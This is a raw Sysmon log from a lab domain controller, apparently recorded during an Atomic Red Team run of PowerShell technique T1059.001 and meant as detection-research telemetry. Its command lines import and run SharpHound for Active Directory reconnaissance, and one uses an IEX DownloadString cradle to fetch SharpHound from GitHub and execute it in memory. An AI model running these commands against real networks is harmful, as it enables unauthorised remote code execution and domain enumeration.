\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.093{05ADC7E1-7062-603D-5288-00000000AD01}6908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1059.001\src\"" -ForegroundColor Cyan import-module C:\AtomicRedTeam\atomics\T1059.001\src\SharpHound.ps1 Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.092{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.091{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:22.067{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=C1E5F829DBEA02A535B3EE6B294BB6E5,SHA256=483BFE9263739BCF6DB5181B64D34211B46F7121167A40E8B6B73E40CC42E203,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001695502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:15.151{00000000-0000-0000-0000-000000000000}7228raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;<unknown process> 354300x80000000000000001695501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:15.153{00000000-0000-0000-0000-000000000000}7228<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local55115-false185.199.110.133cdn-185-199-110-133.github.com443https 23542300x80000000000000001695500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:23.551{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9CFC358C89A186B6F901C041AE3AD4,SHA256=C58D26C61E93BCDCBCBBC0DA08361B359D0A3B11463FD3304E25B82592294473,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:23.457{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2C61C23AFA7A48E217AD4B69BBC9AC05,SHA256=1E78D37FFE328825F86D920006E26F613D085584CAB6C38FAFA212BB89ADFC8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:24.614{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97CB68852638DD4F6D83C2E6C9A85EA,SHA256=5C140F8F9C22C7F677CD0EEBDA938568DF2CDB6DB273B248992CD0B26F860539,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:25.632{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F265CD0BDE96A19AE46D172294D78639,SHA256=EC00FBDC653C36F6E1B93D8EE029E22BC40C8A545DC49A1CBF1B506C4D6DC70E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:25.082{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC712C075A09080D147C7A63E7B83039,SHA256=61590F2A7C90307E74F880E509141EB6B7BCBD3912B990057C31A17DC1096F31,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:18.487{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55116-false10.0.1.12-8000- 23542300x80000000000000001695507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.645{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A9A90DFB20F9CD4666F23D1A58B5ED,SHA256=761F2B35733F993BDD75970F1153CC2D18295B9B416526FFA2B3B8A452914CD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.145{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E2EBCBB9FA3D0599E97BEE06AC67766,SHA256=5CE1C1C1443665B030B5D35CAD61E91AB531153D0FB2E2641F1B751139788E74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.786{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.786{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.733{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.733{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:27.724{05ADC7E1-7067-603D-5388-00000000AD01}6264\PSHost.132591128076357687.6264.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.707{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263E907EF66C5D7FA83A304342D2964F,SHA256=F9F35FD5A768FC402073B3814D483384AB6401158F5DDD64533809F5815B0AAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.707{05ADC7E1-7067-603D-5388-00000000AD01}6264ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_gfkhsx2k.nf0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.707{05ADC7E1-7067-603D-5388-00000000AD01}6264ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_thmaq30c.hcq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.692{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_thmaq30c.hcq.ps12021-03-01 22:53:27.692 10341000x80000000000000001695523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.676{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.633{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.635{05ADC7E1-7067-603D-5388-00000000AD01}6264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""Remote download of SharpHound.ps1 into memory, followed by execution of the script\"" -ForegroundColor Cyan IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5} 